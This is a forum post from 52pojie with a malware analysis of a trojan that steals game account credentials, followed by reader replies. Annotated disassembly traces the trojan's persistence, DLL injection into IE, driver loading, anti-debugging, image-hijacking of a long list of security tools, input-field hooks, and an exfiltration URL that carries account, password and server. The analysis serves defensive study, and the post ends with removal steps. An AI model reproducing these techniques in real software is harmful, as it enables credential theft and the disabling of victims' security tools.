吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 75014|回复: 172
收起左侧

[PC样本分析] 分析盗窃某游戏的帐号和密码的小木马

    [复制链接]
zzage 发表于 2008-10-20 21:33
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【文章标题】分析盗窃某游戏的帐号和密码的小木马
【文章作者】ZzAge[LCG]
【文章目标】某游戏木马
【相关工具】OllyDbg
【作者 Q Q】85400516
【作者邮箱】
zzage@163.com
【作者主页】
http://hi.baidu.com/zzage
【版权声明】此文发布于[吾爱破解]Ww.52PoJie.Cn,转载请注明!

此木马被执行后拷贝自身到系统目录system32下并执行此木马,通过批处理执行自删除,该木马通过创建服务项,使得计算机每次重启后,都运行此木马.把释放的到系统目录下的DLL插入到IE进程.然后修改系统时间,导致某些杀软软件失效~枚举当前进程是否存在杀毒软件等安全软件,如果存在就强制结束进程,然后镜像劫持一大串杀毒软件等安全软件,注册表,任务管理器等....
004015AB > 55 PUSH EBP //入口处 
004015AC 8BEC MOV EBP,ESP 
004015AE 81EC 48020000 SUB ESP,248 
004015B4 E8 E8FEFFFF CALL 21.004014A1 
004015B9 85C0 TEST EAX,EAX 
004015BB 74 68 JE SHORT 21.00401625 //这里跳向00401625!请下图! 
004015BD 68 04010000 PUSH 104 
004015C2 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 
004015C8 50 PUSH EAX 
004015C9 FF15 68204000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; kernel32.GetSystemDirectoryA 
004015CF FF15 4C204000 CALL DWORD PTR DS:[<&KERNEL32.GetTickCou>; kernel32.GetTickCount 
004015D5 50 PUSH EAX 
004015D6 8D85 BCFEFFFF LEA EAX,DWORD PTR SS:[EBP-144] 
004015DC 68 A8214000 PUSH 21.004021A8 ; ASCII "\%d.dll" 
004015E1 50 PUSH EAX 
004015E2 FF15 A0204000 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA 
004015E8 83C4 0C ADD ESP,0C 
004015EB 8D85 BCFEFFFF LEA EAX,DWORD PTR SS:[EBP-144] 
004015F1 50 PUSH EAX 
一:
开始把木马复制到系统目录,并重命名为DnfServer.exe
1.jpg
二:
创建一项新的服务,并启动服务!
2.jpg
三:
在临时文件夹创建一个批处理文件,写入自删除命令,并运行!
3.jpg
3.1.jpg
3.2.jpg
四:
以资源释放的方法把木马的DLL释放到系统目录下!
4.jpg
五:
查找注册表,获取IE的路径!为插入IE做好准备!
5.jpg
在这里开始把DLL插进IE进程!
5.1.jpg
到这里,整个木马的EXE程序的工作流程就基本完成了!

接下来看看木马释放出来的DLL文件!

一 :
 
100011C0 >/$ 837C24 08 01 cmp dword ptr [esp+8], 1 
100011C5 |. 75 31 jnz short 100011F8 
100011C7 |. 8B4424 04 mov eax, dword ptr [esp+4] 
100011CB |. A3 FC530010 mov dword ptr [100053FC], eax 
100011D0 |. A1 10600010 mov eax, dword ptr [10006010] 
100011D5 |. 85C0 test eax, eax 
100011D7 |. 75 1F jnz short 100011F8 
100011D9 |. 6A 00 push 0 ; /pThreadId = NULL 
100011DB |. 6A 00 push 0 ; |CreationFlags = 0 
100011DD |. 6A 00 push 0 ; |pThreadParm = NULL 
100011DF |. 68 20110010 push 10001120 ; |ThreadFunction = eq.10001120 
100011E4 |. 6A 00 push 0 ; |StackSize = 0 
100011E6 |. 6A 00 push 0 ; |pSecurity = NULL 
100011E8 |. C705 10600010>mov dword ptr [10006010], 1 ; | 
100011F2 |. FF15 C0300010 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread 
100011F8 |> B8 01000000 mov eax, 1 
100011FD \. C2 0C00 retn 0C 
创建一个新的线程!直接去到10001120去看一下是什么东西!
 
10001120 . E8 DBFEFFFF call 10001000 
10001125 . 85C0 test eax, eax 
10001127 . 74 0D je short 10001136 
10001129 . E8 D2FEFFFF call 10001000 
1000112E . 6A 00 push 0 ; /ExitCode = 0 
10001130 . FF15 E4300010 call dword ptr [<&KERNEL32.ExitProces>; \ExitProcess 
10001136 > A1 0C600010 mov eax, dword ptr [1000600C] 
1000113B . 85C0 test eax, eax 
1000113D . 74 05 je short 10001144 
1000113F . E8 5C0B0000 call 10001CA0 
10001144 > E8 B7FEFFFF call 10001000 
10001149 . 6A 04 push 4 ; /Style = MB_YESNO|MB_APPLMODAL 
1000114B . 68 88310010 push 10003188 ; |Title = "新起点?,A4,"",D7,"",F7,"室" 
10001150 . 68 98310010 push 10003198 ; |Text = "本软件用于?,B0,"",BB,"赜蜗",B7,"账号?,AC,"具有?,BB,"",B6,"",A8,"的危险性?,AC,"您?,B7,"信要继续运行吗?" 
10001155 . 6A 00 push 0 ; |hOwner = NULL 
10001157 . FF15 0C310010 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA 
1000115D . 83F8 06 cmp eax, 6 
10001160 . 74 08 je short 1000116A 
10001162 . 6A 00 push 0 ; /ExitCode = 0 
10001164 . FF15 E4300010 call dword ptr [<&KERNEL32.ExitProces>; \ExitProcess 
1000116A > A1 00600010 mov eax, dword ptr [10006000] 
1000116F . 56 push esi 
10001170 . 8B35 C0300010 mov esi, dword ptr [<&KERNEL32.Creat>; KERNEL32.CreateThread 
10001176 . 6A 00 push 0 ; /pThreadId = NULL 
10001178 . 6A 00 push 0 ; |CreationFlags = 0 
1000117A . 50 push eax ; |pThreadParm => 00000001 
1000117B . 68 00200010 push 10002000 ; |ThreadFunction = eq.10002000 
10001180 . 6A 00 push 0 ; |StackSize = 0 
10001182 . 6A 00 push 0 ; |pSecurity = NULL 
10001184 . FFD6 call esi ; \CreateThread 
10001186 . A1 08600010 mov eax, dword ptr [10006008] 
1000118B . 85C0 test eax, eax 
1000118D . 74 11 je short 100011A0 
1000118F . 6A 00 push 0 ; /pThreadId = NULL 
10001191 . 6A 00 push 0 ; |CreationFlags = 0 
10001193 . 6A 00 push 0 ; |pThreadParm = NULL 
10001195 . 68 F01D0010 push 10001DF0 ; |ThreadFunction = eq.10001DF0 
1000119A . 6A 00 push 0 ; |StackSize = 0 
1000119C . 6A 00 push 0 ; |pSecurity = NULL 
1000119E . FFD6 call esi ; \CreateThread 
100011A0 > 6A 00 push 0 
100011A2 . 6A 00 push 0 
100011A4 . 6A 00 push 0 
100011A6 . 68 00170010 push 10001700 
100011AB . 6A 00 push 0 
100011AD . 6A 00 push 0 
100011AF . FFD6 call esi 
100011B1 . 33C0 xor eax, eax 
100011B3 . 5E pop esi 
100011B4 . C2 0400 retn 4 
10001120 . E8 DBFEFFFF call 10001000 //到10001120后的第一个CALL!进去看看
d1.jpg
原来是反调试,用isdebuggerpresent函数来检测是否被调试~很古老的反调试,对于目前这么多牛X的OD插件来说,这个反调试几乎可以忽略!
d1.1.jpg
下面还是反调试.枚举当前进程名是否有ollydbg.exe,ollyice.exe,peditor.exe,lordpe.exe,c32asm.exe,importrec.exe这些进程名,有就退出进程!这个,也可以忽略,隐藏下进程就就行!

1000113F . E8 5C0B0000 call 10001CA0 //进去看看是什么
d1.2.jpg
提升进程权限....
二:
d2.jpg
弹出对话框...
d2.1.jpg
有点郁闷了,dome版木马,汗..继续
1000116F . 56 push esi 
10001170 . 8B35 C0300010 mov esi, dword ptr [<&KERNEL32.Creat>; KERNEL32.CreateThread 
10001176 . 6A 00 push 0 ; /pThreadId = NULL 
10001178 . 6A 00 push 0 ; |CreationFlags = 0 
1000117A . 50 push eax ; |pThreadParm => 00000001 
1000117B . 68 00200010 push 10002000 ; |ThreadFunction = 111.10002000 
10001180 . 6A 00 push 0 ; |StackSize = 0 
10001182 . 6A 00 push 0 ; |pSecurity = NULL 
10001184 . FFD6 call esi ; \CreateThread 
有创建一个线程!直接去10002000处看看是什么!
d2.2.jpg
汗,有驱动!继续!
 
10002042 . E8 59040000 call 100024A0 //这个进去看看 
100024A0 /$ 8B4424 08 mov eax, dword ptr [esp+8] 
100024A4 |. 0FB74C24 0C movzx ecx, word ptr [esp+C] 
100024A9 |. 53 push ebx 
100024AA |. 8B5C24 08 mov ebx, dword ptr [esp+8] 
100024AE |. 56 push esi 
100024AF |. 50 push eax ; /ResourceType 
100024B0 |. 51 push ecx ; |ResourceName 
100024B1 |. 53 push ebx ; |hModule 
100024B2 |. FF15 98300010 call dword ptr [<&KERNEL32.FindResour>; \FindResourceA 
100024B8 |. 8BF0 mov esi, eax 
100024BA |. 85F6 test esi, esi 
100024BC |. 75 03 jnz short 100024C1 
100024BE |. 5E pop esi 
100024BF |. 5B pop ebx 
100024C0 |. C3 retn 
100024C1 |> 57 push edi 
100024C2 |. 56 push esi ; /hResource 
100024C3 |. 53 push ebx ; |hModule 
100024C4 |. FF15 94300010 call dword ptr [<&KERNEL32.LoadResour>; \LoadResource 
100024CA |. 56 push esi ; /hResource 
100024CB |. 53 push ebx ; |hModule 
100024CC |. 8BF8 mov edi, eax ; | 
100024CE |. FF15 90300010 call dword ptr [<&KERNEL32.SizeofReso>; \SizeofResource 
100024D4 |. 85FF test edi, edi 
100024D6 |. 8BD8 mov ebx, eax 
100024D8 |. 75 06 jnz short 100024E0 
100024DA |> 5F pop edi 
100024DB |. 5E pop esi 
100024DC |. 33C0 xor eax, eax 
100024DE |. 5B pop ebx 
100024DF |. C3 retn 
以资源释放的方法把驱动文件释放到系统目录下!再往下看!
10002061 . E8 5A030000 call 100023C0 //这个CALL进去看看!
d2.3.jpg
使用CreateFile来打开设备驱动程序

首先,把木马的EXE程序再入ollydbg里面.
\\.\Khelper_prochook 为设备路径
d2.4.jpg
通过SCM加载驱动!
三:
d3.jpg
调用SeSystemtimePrivilege特权更改系统时间(过主动?)
d3.1.jpg.jpg
很邪恶的驱动与杀毒之间的屠杀...不晓得谁先杀谁!哈哈
四:
1000118F . 6A 00 push 0 ; /pThreadId = NULL 
10001191 . 6A 00 push 0 ; |CreationFlags = 0 
10001193 . 6A 00 push 0 ; |pThreadParm = NULL 
10001195 . 68 F01D0010 push 10001DF0 ; |ThreadFunction = 111.10001DF0 
1000119A . 6A 00 push 0 ; |StackSize = 0 
1000119C . 6A 00 push 0 ; |pSecurity = NULL 
1000119E . FFD6 call esi ; \CreateThread 
又有创建一个线程!直接去10001DF0处看看是什么!

d4.jpg
万恶的镜像劫持开始了...
d4.1.jpg
注册表被劫持了..还要调用RegNotifyChangeKeyValue函数,监视注册表是否有被修改.镜像劫持了,连个气都不给喘一下?
五:
 
100011A0 > \6A 00 push 0 
100011A2 . 6A 00 push 0 
100011A4 . 6A 00 push 0 
100011A6 . 68 00170010 push 10001700 
100011AB . 6A 00 push 0 
100011AD . 6A 00 push 0 
100011AF . FFD6 call esi 
这也是创建一个线程!直接去10001700处看看是什么!
d5.jpg
噢,开始做正真的坏事了...
d5.1.jpg
找到目标窗口调用SetWindowsHookExA设置全局钩子
1000175F . 68 60150010 push 10001560 ; |Hookproc = 111.10001560
到10001560看看钩了什么~
1000159C . 50 push eax ; /ControlID 
1000159D . 8B46 0C mov eax, dword ptr [esi+C] ; | 
100015A0 . 50 push eax ; |hWnd 
100015A1 . FF15 EC300010 call dword ptr [<&USER32.GetDlgItem>] ; \GetDlgItem 
100015A7 . 33C9 xor ecx, ecx 
100015A9 . 894C24 09 mov dword ptr [esp+9], ecx 
100015AD . 894C24 0D mov dword ptr [esp+D], ecx 
100015B1 . 894C24 11 mov dword ptr [esp+11], ecx 
100015B5 . 894C24 15 mov dword ptr [esp+15], ecx 
100015B9 . 894C24 19 mov dword ptr [esp+19], ecx 
100015BD . 894C24 1D mov dword ptr [esp+1D], ecx 
100015C1 . 6A 20 push 20 ; /Count = 20 (32.) 
100015C3 . 8D5424 0C lea edx, dword ptr [esp+C] ; | 
100015C7 . 894C24 25 mov dword ptr [esp+25], ecx ; | 
100015CB . 52 push edx ; |Buffer 
100015CC . 66:894C24 2D mov word ptr [esp+2D], cx ; | 
100015D1 . 50 push eax ; |hWnd 
100015D2 . C64424 14 00 mov byte ptr [esp+14], 0 ; | 
100015D7 . 884C24 33 mov byte ptr [esp+33], cl ; | 
100015DB . FF15 F0300010 call dword ptr [<&USER32.GetWindowTex>; \GetWindowTextA 
很邪恶的开始,监视输入框!获取输入框的内容!也就是想获取游戏帐号是在哪一区!
10001696 . 6A 00 push 0 ; /pThreadId = NULL 
10001698 . 6A 00 push 0 ; |CreationFlags = 0 
1000169A . 6A 00 push 0 ; |pThreadParm = NULL 
1000169C . 68 B0140010 push 100014B0 ; |ThreadFunction = 111.100014B0 
100016A1 . 6A 00 push 0 ; |StackSize = 0 
100016A3 . 6A 00 push 0 ; |pSecurity = NULL 
100016A5 . FF15 C0300010 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread 
进100014B0瞧瞧
d5.2.jpg
10001501 . FF15 F8300010 call dword ptr [<&USER32.GetWindowThr>; \GetWindowThreadProcessId 
10001507 . 8B0D FC530010 mov ecx, dword ptr [100053FC] 
1000150D . 50 push eax ; /ThreadID 
1000150E . 51 push ecx ; |hModule => NULL 
1000150F . 68 30140010 push 10001430 ; |Hookproc = 111.10001430 
10001514 . 6A 04 push 4 ; |HookType = WH_CALLWNDPROC 
10001516 . FF15 00310010 call dword ptr [<&USER32.SetWindowsHo>; \SetWindowsHookExA 
找到目标窗口调用SetWindowsHookExA设置全局钩子,进10001430看看HOOK什么
10001439 . 6A 00 push 0 ; /pThreadId = NULL 
1000143B . 6A 00 push 0 ; |CreationFlags = 0 
1000143D . 6A 00 push 0 ; |pThreadParm = NULL 
1000143F . 68 90130010 push 10001390 ; |ThreadFunction = 111.10001390 
10001444 . 6A 00 push 0 ; |StackSize = 0 
10001446 . 6A 00 push 0 ; |pSecurity = NULL 
进10001390看看!
d5.3.jpg
注射代码

去10001370看看是什么东西
10001370 . 60 pushad ; 注射的代码...有内容! 
10001371 . 53 push ebx 
10001372 . 51 push ecx 
10001373 . E8 D8FFFFFF call 10001350 ; 进去看看 
10001378 . 61 popad 
10001379 . 66:8BF9 mov di, cx 
1000137C . 66:0BF1 or si, cx 
1000137F . BF 302C4000 mov edi, 402C30 ; 注射代码完毕,让注射目标程序继续运行 
10001384 . FFE7 jmp edi 
10001350 /$ 8B4424 04 mov eax, dword ptr [esp+4] 
10001354 |. 8B4C24 08 mov ecx, dword ptr [esp+8] 
10001358 |. 50 push eax 
10001359 |. 51 push ecx 
1000135A |. E8 A1FEFFFF call 10001200 ; 继续前进 
1000135F \. C2 0800 retn 8 
获取游戏帐号和密码后,开始发信了....
10001200 /$ 55 push ebp 
10001201 |. 8BEC mov ebp, esp 
10001203 |. 83E4 F8 and esp, FFFFFFF8 
10001206 |. 81EC E4030000 sub esp, 3E4 
1000120C |. 53 push ebx 
1000120D |. 56 push esi 
1000120E |. 57 push edi ; URLDownloadToFileA?貌似有留后门! 
1000120F |. 68 D8310010 push 100031D8 ; /ProcNameOrOrdinal = "URLDownloadToFileA" 
10001214 |. 68 EC310010 push 100031EC ; |/FileName = "Urlmon.dll" 
10001219 |. FF15 C4300010 call dword ptr [<&KERNEL32.LoadLibrar>; |\LoadLibraryA 
1000121F |. 50 push eax ; |hModule 
10001220 |. FF15 C8300010 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress 
10001226 |. 8BD8 mov ebx, eax 
10001228 |. 33C0 xor eax, eax 
1000122A |. C64424 10 00 mov byte ptr [esp+10], 0 
1000122F |. B9 18000000 mov ecx, 18 
10001234 |. 8D7C24 11 lea edi, dword ptr [esp+11] 
10001238 |. F3:AB rep stos dword ptr es:[edi] 
1000123A |. 66:AB stos word ptr es:[edi] 
1000123C |. AA stos byte ptr es:[edi] 
1000123D |. 33C0 xor eax, eax 
1000123F |. C64424 78 00 mov byte ptr [esp+78], 0 
10001244 |. B9 18000000 mov ecx, 18 
10001249 |. 8D7C24 79 lea edi, dword ptr [esp+79] 
1000124D |. F3:AB rep stos dword ptr es:[edi] 
1000124F |. 66:AB stos word ptr es:[edi] 
10001251 |. AA stos byte ptr es:[edi] 
10001252 |. 8B45 08 mov eax, dword ptr [ebp+8] 
10001255 |. 50 push eax 
10001256 |. 8D4C24 14 lea ecx, dword ptr [esp+14] 
1000125A |. 6A 64 push 64 
1000125C |. 51 push ecx 
1000125D |. E8 DE120000 call 10002540 ;获取帐号 
10001262 |. 8B55 0C mov edx, dword ptr [ebp+C] 
10001265 |. 52 push edx 
10001266 |. 8D8424 880000>lea eax, dword ptr [esp+88] 
1000126D |. 6A 64 push 64 
1000126F |. 50 push eax 
10001270 |. E8 CB120000 call 10002540 ; 获取密码 
10001275 |. C68424 F80000>mov byte ptr [esp+F8], 0 
1000127D |. 33C0 xor eax, eax 
1000127F |. B9 40000000 mov ecx, 40 
10001284 |. 8DBC24 F90000>lea edi, dword ptr [esp+F9] 
1000128B |. F3:AB rep stos dword ptr es:[edi] 
1000128D |. 66:AB stos word ptr es:[edi] 
1000128F |. AA stos byte ptr es:[edi] 
10001290 |. A1 80500010 mov eax, dword ptr [10005080] 
10001295 |. 8BC8 mov ecx, eax 
10001297 |. 8BD1 mov edx, ecx 
10001299 |. C1E9 02 shr ecx, 2 
1000129C |. BE 00500010 mov esi, 10005000 
100012A1 |. 8DBC24 F80000>lea edi, dword ptr [esp+F8] 
100012A8 |. F3:A5 rep movs dword ptr es:[edi], dword p> 
100012AA |. 50 push eax 
100012AB |. 8BCA mov ecx, edx 
100012AD |. 8D8424 FC0000>lea eax, dword ptr [esp+FC] 
100012B4 |. 83E1 03 and ecx, 3 
100012B7 |. 50 push eax 
100012B8 |. F3:A4 rep movs byte ptr es:[edi], byte ptr> 
100012BA |. E8 31140000 call 100026F0 ; 收信地址解密! 
100012BF |. 8B35 B8300010 mov esi, dword ptr [<&KERNEL32.GetTi>; KERNEL32.GetTickCount 
100012C5 |. 83C4 20 add esp, 20 
100012C8 |. FFD6 call esi ; [GetTickCount 
100012CA |. 8B3D 08310010 mov edi, dword ptr [<&USER32.wsprint>; USER32.wsprintfA 
100012D0 |. 50 push eax ; /<%d> 
100012D1 |. 68 1C600010 push 1000601C ; |<%s> = "" 
100012D6 |. 8D8C24 800000>lea ecx, dword ptr [esp+80] ; | 
100012DD |. 51 push ecx ; |<%s> 
100012DE |. 8D5424 1C lea edx, dword ptr [esp+1C] ; | 
100012E2 |. 52 push edx ; |<%s> 
100012E3 |. 8D8424 F00000>lea eax, dword ptr [esp+F0] ; | 
100012EA |. 50 push eax ; |<%s> 
100012EB |. 8D8C24 040300>lea ecx, dword ptr [esp+304] ; | 
100012F2 |. 68 F8310010 push 100031F8 ; |Format = "%s?acnt=%s&pass=%s&serv=%s&game=Dnf&temp=%d" 
100012F7 |. 51 push ecx ; |s 
100012F8 |. FFD7 call edi ; \wsprintfA 
100012FA |. 83C4 1C add esp, 1C 
100012FD |. 8D9424 E80100>lea edx, dword ptr [esp+1E8] 
10001304 |. 52 push edx ; /Buffer 
10001305 |. 68 04010000 push 104 ; |BufSize = 104 (260.) 
1000130A |. FF15 BC300010 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA 
10001310 |. FFD6 call esi 
10001312 |. 50 push eax 
10001313 |. 8D8424 EC0100>lea eax, dword ptr [esp+1EC] 
1000131A |. 50 push eax 
1000131B |. 8BC8 mov ecx, eax 
1000131D |. 68 24320010 push 10003224 ; ASCII "%s%d" 
10001322 |. 51 push ecx 
10001323 |. FFD7 call edi 
10001325 |. 83C4 10 add esp, 10 
10001328 |. 6A 00 push 0 
1000132A |. 6A 00 push 0 
1000132C |. 8D9424 F00100>lea edx, dword ptr [esp+1F0] 
10001333 |. 52 push edx 
10001334 |. 8D8424 FC0200>lea eax, dword ptr [esp+2FC] 
1000133B |. 50 push eax 
1000133C |. 6A 00 push 0 
1000133E |. FFD3 call ebx ; URLMON.URLDownloadToFileA 
10001340 |. 5F pop edi 
10001341 |. 5E pop esi 
10001342 |. 33C0 xor eax, eax 
10001344 |. 5B pop ebx 
10001345 |. 8BE5 mov esp, ebp 
10001347 |. 5D pop ebp 
10001348 \. C2 0800 retn 
至于如何清除此木马,很容易,360的文件名随便改一下,就可以运行,关闭此木马的DLL插入的IE进程!然后打开注册表SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options,把一大串的镜像劫持的注册表项删除掉,或者直接用360的清除恶意插件,也可以,然后把木马的服务删除掉,进系统目录把木马的EXE文件,DLL文件删除,驱动文件删除,就OK了

木马的镜像劫持文件有以下一大串:
pccguide.exe,PCCClient.exe,pccguide.exe,PCCClient.exe,Rfw.exe,DAVPFW.exe,VPC32.exe,RavMon.exe,debu.exe,scan.exe,mon.exe,vir.exe,iom.exe,ice.exe,anti.exe,fir.exe,prot.exe,secu.exe,dbg.exe,pcc.exe,avk.exev,spy.exev,pcciomon.exe,pccmain.exe,pop3trap.exe,webtrap.exe,vshwin32.exe,vsstat.exe,navapw32.exe,lucomserver.exe,lamapp.exe,atrack.exe,nisserv.exe,vavrunr.exe,navwnt.exe,pview95.exe,luall.exe,avxonsol.exe,avsynmgr.exe,symproxysvc.exe,regedit.exe,smtpsvc.exe,moniker.exe,program.exe,explorewclass.exe,rn.exe,ms.exe,microsoft.exe,ms.exe,office.exe,smtpsvc.exe,POP3TRAP.exe,WEBTRAP.exe,AVCONSOL.exe,AVSYNMGR.exe,VSHWIN32.exe,VSSTAT.exe,NAVAPW32.exe,NAVW32.exe,NMAIN.exe,LUALL.exe,LUCOMSERVER.exe,IAMAPP.exe,ATRACK.exe,nisserv.exe,rescue32.exe,symproxysvc.exe,nisum.exe,navapsvc.exe,navlu32.exe,navrunr.exe,pview95.exe,f-stopw.exe,f-prot95.exe,Pccwin98.exe,iomon98.exe,fp-win.exe,nvc95.exe,norton.exe,mcafee.exe,antivir.exe,webscanx.exe,safeweb.exe,cfinet.exe,cfinet32.exe,avp.exe,lockdown2000.exe,avp32.exe,zonealarm.exe,wink.exe,sirc32.exe,scam32.exe,regedit.exe,TMOAgent.exe,Tmntsrv.exe,tmproxy.exe,tmupdito.exe,TSC.exe,KRF.exe,KPFW32.exe,_AVPM.exe,AUTODOWN.exe,AVKSERV.exe,AVPUPD.exe,BLACKD.exe,CFIND.exe,CLEANER.exe,ECENGINE.exe,F-PROT.exe,FP-WIN.exe,IAMSERV.exe,ICLOADNT.exe,LOOKOUT.exe,N32ACAN.exe,NAVW32.exe,NORMIST.exe,PADMIN.exe,pccwin98.exe,rav7win.exe,SMC.exe,TCA.exe,VETTRAY.exe,VSSTAT.exe,ACKWIN32.exe,AVCONSOL.exe,AVPNT.exe,avpdos32.exe,AVSCHED32.exe,BLACKICE.exe,EFINET32.exe,CLEANER3.exe,ESAFE.exe,F-PROT95.exe,IBMASN.exe,ICMOON.exe,IOMON98.EXE,LUALL.EXE,NAVAPW32.EXE,NAVWNT.EXE,NUPGRADE.EXE,PAVCL.EXE,PCFWALLICON.EXE,PCFWALLICON.EXE,SCANPM.EXE,SPHINX.EXE,TDS2-98.EXE,VSSCAN40,WEBSCANX.EXE,WEBSCAN.EXE,ANTI-TROJAN.EXE,AVE32.EXE,AVP.EXE,AVPM.EXE,AVWIN95.EXE,CFIADMIN.EXE,CLAW95.EXE,DVP95.EXE,ESPWATCH.EXE,F-STOPW.EXE,FRW.EXE,IBMAVSP.EXE,ICSUPP95,JED.EXE,MOOLIVE.EXE,NAVLU32.EXE,NISUM.EXE,NVC95.EXE,NAVSCHED.EXE,PERSFW.EXE,SAFEWEB.EXE,SCRSCAN.EXE,SWEEP95.EXE,TDS2-NT.EXE,VSECOMR.EXE,WFINDV32.EXE,AVPCC.EXE,_AVPCC.EXE,APVXDWIN.EXE,AAVGCTRL.EXE,_AVP32.EXE,AVPTC32.EXE,CFIAUDIT.EXE,CLAW95CT.EXE,DV95_O.EXE,DV95.EXE,FAGNT95.EXE,FINDVIRU.EXE,IAMAPP.EXEICLOAD95.EXE,ICSSUPPNT.EXE,LOCKDOWN2000.EXEMPFTRAY.EXE,NAVNT.EXE,NMAIN.EXEOUTPOST.EXE,NAVW.EXE,RAV7.EXESCAN32.EXE,SERV95.EXE,BSCAN.EXE,VET95.EXE,VSHWIN32.EXE,ZONEALARM.EXE,AVPMON.EXE,AVP32.EXE,windows优化师.EXE,scon.exe,avpcc.exetaskmgr.exe,IceSword.exesafeboxtray.exe,360safe.exe,360tray.exe,360safebox.exekwatch.exe,kpfwsvc.exe,kavstart.exe,kissvc.exe,kpfw32.exe,kav32.exe,

------------------------------------------我是分割线-----------------------------------------


现在才发现编辑个帖子真的很痛苦!
第一次写的分析木马的帖子,分析不够专业,写文章不够专业,自己也是菜鸟。等大牛指教....
分析这个,感觉还是学到了一些东西...哈哈,能学到东西就满足了!

木马样本.rar

12 KB, 下载次数: 239, 下载积分: 吾爱币 -1 CB

免费评分

参与人数 1热心值 +1 收起 理由
惹火上身 + 1 精品文章!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

BabyLovez 发表于 2008-10-20 21:53
親愛的,我來給你加油了 [s:45]
Hmily 发表于 2008-10-20 22:01
100012BA|.E8 31140000 call100026F0 ;收信地址解密!


这里再搞个算法分析教程,可以再给你搞个精华~ [s:19]
killerzeno 发表于 2008-10-20 22:05

Re:-分析盗窃某游戏的帐号和密码的小木马

↖(^ω^)↗,支持你,支持吾爱破解!脱壳区,没权利给你加分咯!精神上支持!O(∩_∩)O哈哈~ [s:372]
小瞬子 发表于 2008-10-20 22:08
[s:39] Zz....分析得不错,偶学习了
温柔刀客 发表于 2008-10-20 22:46
挺不错的...确实看的也很清楚...样本我要了
nv21 发表于 2008-10-20 22:56
很好 很强大还有点暴力~!!!!!!!!!! [s:40]
pdswxl 发表于 2008-10-20 23:41
真是受用非浅谢谢让我学习!
此人被禁 发表于 2008-10-21 01:08
只看懂一点点.. [s:38]
hawk44 发表于 2008-10-21 09:53
不错的文章很细致的
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-23 06:00

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表